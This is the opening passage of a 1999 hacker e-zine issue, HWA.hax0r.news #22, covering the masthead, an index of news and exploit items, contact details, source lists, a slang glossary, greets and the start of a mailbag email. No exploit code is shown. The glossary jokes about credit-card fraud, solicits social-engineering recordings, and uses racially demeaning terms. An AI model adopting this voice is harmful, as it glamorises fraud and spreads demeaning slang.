[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 22 Volume 1 1999 June 26th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* *
Note:
* *
This issue covers events from June 6th thru June 26th so don't be too
* rough on me, I know this is a weekly production but I had to do 3 wks *
in only a few days so forgive some of the bad formatting.
* *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #22
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #22
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. AntiOnline crosses the line......................................
03.1 .. More Questions Raised about John Vranesevich and AntiOnline .....
04.0 .. The Difficulties of Reporting the Underground....................
05.0 .. Mitnick Demonstrations Deemed a Huge Success ....................
06.0 .. New Trojan/Virus, PrettyPark ....................................
06.1 .. The rampage continues ...........................................
07.0 .. Eight Arrested in California (Piracy)............................
08.0 .. 278 Internet Cafes Disciplined ..................................
09.0 .. Forbidden Knowledge Issue #5 ....................................
10.0 .. f41th Issue 6 ...................................................
11.0 .. Antidote Vol2 Issue 7 ...........................................
12.0 .. Will the Allies Drop CyberBombs on Milosevic? ...................
13.0 .. Melissa Suspect Still not Charged ...............................
14.0 ..*ToorCon '99 Security Expo --------- DATE CHANGED! -----------....
15.0 .. ISS Gets Free Advertising .......................................
16.0 .. Accounting Firms also get Free Advertising ......................
17.0 .. Analyzer Starts Computer Security Business ......................
18.0 .. $2.9Bil in Piracy in The US......................................
19.0 .. Congress and NSA tangle over Echelon.............................
20.0 .. Emutronix Phone Hacking Products releases new Mach emulator......
21.0 .. Is That Spelled With a "PH" or an "F" ...........................
22.0 .. The Demonizing of the Hacker ....................................
23.0 .. More Email Worms/Trojan .........................................
24.0 .. Stanford Searches for "Hacker" ..................................
25.0 .. Mitnick Demo Pictures now Available..............................
26.0 .. Does Cracking Affect Consumer Confidence? .......................
27.0 .. Worm.ExploreZip is Causing Massive Damage .......................
28.0 .. Don't Forget About BackDoor-G, it is Still Around ...............
29.0 .. MS Antritrust Trial Looks at Security ...........................
30.0 .. Web Defacements Hindering Open Government .......................
31.0 .. Worm.ExploreZip Continues its Rampage ...........................
32.0 .. Senate web site hacked again(!)..................................
33.0 .. Mitnick Sentencing Hearing Rescheduled ..........................
34.0 .. Russia Looks to Beef Up its Version of Echelon...................
35.0 .. Company Claims CyberAttack by Competitor ........................
36.0 .. LA set to Allow Internet Voting .................................
37.0 .. CCC Camp Shapes Up ..............................................
38.0 .. Hong Kong Makes Major Piracy Bust ...............................
39.0 .. Ernst & Young Profile ...........................................
40.0 .. What is Your Privacy Worth? .....................................
41.0 .. BSA Tactics Condemned by UK .....................................
42.0 .. US Allows 128bit SSL Into Japan .................................
43.0 .. Terroist About to Cause Electronic Chaos ........................
44.0 .. Major Remote Hole Found in IIS ..................................
45.0 .. Outlook Express 4.5 Email Bug ...................................
46.0 .. Major Pirates Convicted .........................................
47.0 .. Fear of Y2K Raises Security Concerns ............................
48.0 .. Israeli Banks Thwart Attempted Cyber Break-In ...................
49.0 .. Navy Wants Tighter Network Security .............................
50.0 .. IIS Hole Continues to Make News/Fix Available ...................
51.0 .. World Braces for International Day of Action ....................
52.0 .. ECD Targets Mexican Government ..................................
53.0 .. Cyber Attacks in Australia Double ...............................
54.0 .. SmartCards Next Stop for Internet Crime .........................
55.0 .. Internet Was Designed without Security ..........................
56.0 .. Original Apple I On the Auction Block ...........................
57.0 .. Microsoft Calls eEye Irresponsible ..............................
58.0 .. Has the FBI Overreacted? .......................................
59.0 .. Printer at Spa War Compromised .................................
60.0 .. Popular Singapore Sites Defaced .................................
61.0 .. DOD Says its CRAP! (Mustn't be Scottish) ........................
62.0 .. DOE Still Unsecure .............................................
63.0 .. Terrorists Use the Net .........................................
64.0 .. Beat the CIA at their own game? - crypto sculpture cracking .....
65.0 .. Pirates of Silicon Valley .......................................
66.0 .. .mil hacker cartoon .............................................
67.0 .. If Software Breaks Who is Liable? . .............................
68.0 .. Trinux Release 0.61 ............................................
69.0 .. Australia Looks to Increase Local Police Powers ................
70.0 .. Aussie Gov Downloads Porn ......................................
71.0 .. Software Glitch or Security Breach .............................
72.0 .. Viruses Cost Companies Big Dough ...............................
73.0 .. B4B0 Issue 8 Released. .........................................
74.0 .. f41th Issue 7 ..................................................
75.0 .. DOD Considers New Network ......................................
76.0 .. NCIS Calls For National Computer Crime Squad ...................
77.0 .. !Hispahack Found Not Guilty ....................................
78.0 .. asahi.com Defaced ...............................................
79.0 .. NSTAC Releases Reports .........................................
80.0 .. FBI This Week ..................................................
81.0 .. Cartoon Hackers?? (From HNN rumours section) ....................
82.0 .. Nuke Labs Stand Down ...........................................
83.0 .. X-Force Down Under is Hiring ...................................
84.0 .. More Canadian RedBoxing from HackCanada with the RIO ............
85.0 .. SecureMac is Now Open ..........................................
86.0 .. Microsoft Demands Privacy ......................................
87.0 .. Pentium III has 46 Bugs ........................................
88.0 .. 'War' Against FBI Continues ....................................
89.0 .. Singapore Officials Arrest Two .................................
90.0 .. GSA Looking for IDS ............................................
91.0 ..+Theres Money in them thar videos! (DEFCON WEBCAST) ..............
92.0 .. Kasparov Defaced? ..............................................
93.0 .. Russ Cooper Interview ..........................................
94.0 .. Thanks-CGI Defaced With Its Own Script .........................
95.0 .. *ToorCon Date Changes --------- DATE CHANGE! ----------.........
96.0 .. Gov Vulnerable Due to Lack of Training .........................
97.0 .. Need skewled in juarez?: Teeside University Offers Degree in Warez
98.0 ..+FREE DefCon WebCasts ...........................................
99.0 .. Old Modem Flaw Still Haunts Users ...............................
(... some modem users may be disconnected at the end of this ezine ;)
100.0 .. Another government server cracked today .........................
101.0 .. MailMan.cookie attack ...........................................
102.0 .. misfrag.c nasty piece of code from P.A.T.C.H ....................
103.0 .. Double-byte code vulnerability, MS Security Bulletin ............
104.0 .. 50 Ways to defeat your IDS.......................................
105.0 .. 50 reasons IDS systems work by Ron Gula..........................
106.0 .. June 15th: Bruce Schneier's Cryptogram...........................
107.0 .. pop.c pop-2, remote exploit by smiler............................
108.0 .. afio: security hole in 'afio -P pgp' encrypted archives..........
109.0 .. C-Mail SMTP Server Remote Buffer Overflow Exploit................
110.0 .. CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
111.0 .. The IIS4 eEye security advisory and threads as mentioned previously
112.0 .. BO server flooder sends random spoofed udp's to the attacker......
113.0 .. frootcake.c revisited.............................................
114.0 .. gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up
115.0 .. IIS Remote Exploit (injection code)...............................
116.0 .. ActiveX security revisited........................................
117.0 .. denial of service attack against NT PDC from Win95 workstation....
118.0 .. Microsoft win2k PASV vulnerability................................
119.0 .. useradd -p stores cleartext passwords / shadow-980724.............
120.0 .. UID 65536 and shadow-19990307 root compromise.....................
121.0 .. big brother in your cc(!) ........................................
122.0 .. TCP MD5 option problem (router DoS)...............................
123.0 .. tcpdump 3.4 bug? (DoS)...........................................
124.0 .. [ISN] A mouse that roars? ........................................
125.0 .. [ISN] Product Review: NOVaSTOR DataSAFE...........................
126.0 .. [ISN] Technology a threat to right of privacy Silicon Valley......
=--------------------------------------------------------------------------=
RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites)
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................Link
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
Link
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
Link
http://www.ottawacitizen.com/business/
Link
http://search.yahoo.com.sg/search/news_sg?p=hack
Link
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
Link
http://www.zdnet.com/zdtv/cybercrime/
Link
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
Link
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
Link
http://freespeech.org/eua/ Electronic Underground Affiliation
Link
http://ech0.cjb.net ech0 Security
Link
http://axon.jccc.net/hir/ Hackers Information Report
Link
http://net-security.org Net Security
Link
http://www.403-security.org Daily news and security related site
Link
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin . To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
Link
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking
C - Cracking
V - Virus
W - Warfare
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten"
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security Ken
pr0xy Astral
and the #innerpulse, crew (innerpulse is back!) and some inhabitants
of #leetchans .... although I use the term 'leet loosely these days,
;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ PacketStorm Security's site has MOVED, update your links to
http://packetstorm.harvard.edu/
++ Spikeman's DoS site is no more, it has been removed from the
Genocide2600 servers, there are no immediate plans to revive the
site but Spike says he hasn't ruled out the possibility completely
and has had an offer to host the site from another provider.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
================================================================
Delivered-To: dok-cruciphux@dok.org
Received: (qmail 11079 invoked from network); 14 Jun 1999 03:48:22 -0000
Received: from md.egroups.com (207.138.41.139)
by physical.graffiti.datacrest.com with SMTP; 14 Jun 1999 03:48:22 -0000
Received: from [10.1.1.23] by md.egroups.com with NNFMP; 14 Jun 1999 04:48:18 -0000
Mailing-List: contact a-s_mag-owner@egroups.com
X-Mailing-List: a-s_mag@egroups.com
X-URL: http://www.egroups.com/list/a-s_mag/
Delivered-To: listsaver-egroups-a-s_mag@egroups.com
Received: (qmail 3968 invoked by uid 7770); 14 Jun 1999 03:43:43 -0000
Received: from ah-img-2.compuserve.com (HELO hpamgaab.compuserve.com) (149.174.217.153)
by vault.egroups.com with SMTP; 14 Jun 1999 03:43:43 -0000
Received: (from mailgate@localhost)
by hpamgaab.compuserve.com (8.8.8/8.8.8/HP-1.5) id XAA29122
for a-s_mag@egroups.com; Sun, 13 Jun 1999 23:43:42 -0400 (EDT)
Date: Sun, 13 Jun 1999 23:43:11 -0400
From: "Armageddon."
Sender: "Armageddon."
To: A-S subscribers
Message-ID: <199906132343_MC2-793F-3C4B@compuserve.com>
MIME-Version: 1.0
Content-Disposition: inline
Subject: [a-s_mag] Important : A-S Meet-up date.
Content-Type: text/plain; charset=ISO-8859-1
Hi,
There has been a change to the date of the A-S meet-up, as you
probablly read in A-S14 we said the date would be the 24th of July. This
has had to be changed as its be discovered that its not actually going to
clash with Compulsion as we planned. The new date is : 31st of July.
I'll be re-uploading A-S14 correcting this in the magazine to soften the
blow of readers who have the wrong date. Those who contacted us via email
will all be contacted with the new details and posts will go out on the
news groups and in as many other magazines that we know have readers who
